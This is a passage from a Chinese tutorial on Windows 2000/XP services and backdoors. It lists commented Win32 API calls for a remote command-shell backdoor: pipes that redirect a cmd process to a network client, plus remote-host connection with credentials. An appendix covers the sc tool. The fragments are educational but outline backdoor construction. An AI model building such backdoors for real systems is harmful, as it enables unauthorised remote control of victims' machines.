浅析Windows2000/XP服务与后门技术

核心提示：3.后门程序相关函数hMutex=CreateMutex(NULL,FALSE,NULL);//创建互斥量；hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);//创建处理客户端访问的重定向输入输出线程；CreatePipe(&hReadPipe,

3.后门程序相关函数

hMutex=CreateMutex(NULL,FALSE,NULL);
　　//创建互斥量；
　　hThread=CreateThread(NULL,0,CmdShell,(LPVOID)&sClient,0,NULL);
　　//创建处理客户端访问的重定向输入输出线程；
　　CreatePipe(&hReadPipe,&hReadShell,&saPipe,0);
　　CreatePipe(&hWriteShell,&hWritePipe,&saPipe,0);
　　//创建用于进程间通信的输入/输出管道；
　　CreateProcess(lpImagePath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&lpStartupInfo,&lpProcessInfo);
　　//创建经重定向输入输出的Cmd进程；
　　hThread[1]=CreateThread(NULL,0,ReadShell,(LPVOID*)&sdRead,0,&dwSendThreadId);
　　hThread[2]=CreateThread(NULL,0,WriteShell,(LPVOID *)&sdWrite,0,&dwReavThreadId);
　　//创建处理Cmd输入输出的线程；
　　dwResult=WaitForMultipleObjects(3,hThread,FALSE,INFINITE);
　　//等待线程或进程的结束；
　　ReleaseMutex(hMutex);
　　//释放互斥量；
　　PeekNamedPipe(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL);
　　//从管道中复制数据到缓冲区中，但不从管道中移出；
　　ReadFile(sdRead.hPipe,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
　　//从管道中复制数据到缓冲区中；
　　WriteFile(sdWrite.hPipe,szBuffer2Write,dwBuffer2Write,&dwBufferWritten,NULL);
　　//向管道中写入从客户端接收到的数据；
　　dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
　　//与远程主机建立连接；
　　WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
　　//与远程主机结束连接；

六、附录

1.SC简介

SC是一个与NT服务控制器，服务进程进行通信的控制台程序，它可以查询和修改已安装服务的数据库。

语法：sc <server> [command] [service name] <option1> <option2>... ，选项<server>为“\\ServerName”的形式。

主要的命令包括：query,config,qc,delete,create,GetDisplayName,GetKeyName,EnumDepend等。

2.T-Cmd v1.0 源代码

请见本文提供的配套示例源代码

关于：

FZ5FZ，我们主要从事网络/系统安全的学习与研究，深入编程技术的剖析与探讨，坚持原创，追求共享。

本文配套源码